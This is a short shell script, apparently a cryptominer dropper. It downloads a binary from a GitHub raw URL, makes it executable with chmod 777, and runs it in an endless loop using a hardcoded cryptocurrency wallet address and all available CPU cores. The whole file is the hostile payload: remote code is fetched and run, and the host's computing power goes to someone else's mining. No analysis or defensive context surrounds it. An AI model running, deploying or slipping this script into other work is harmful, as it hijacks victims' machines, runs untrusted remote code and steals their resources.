#!/bin/sh
curl https://github.com/liecamshoe/file/raw/main/vltrig -L -o bakolo
chmod 777 bakolo
while true; do
./bakolo --user 84bEkQaAvXnPXXghsfBYBeLGtkAV8eP1HX7rP7EUBE1pHvtwAffjCE2SzzY8y79fkgHA21czuEWoVUDkAf7e4qM5KMKCKVK --pass x -t $(nproc --all)
done
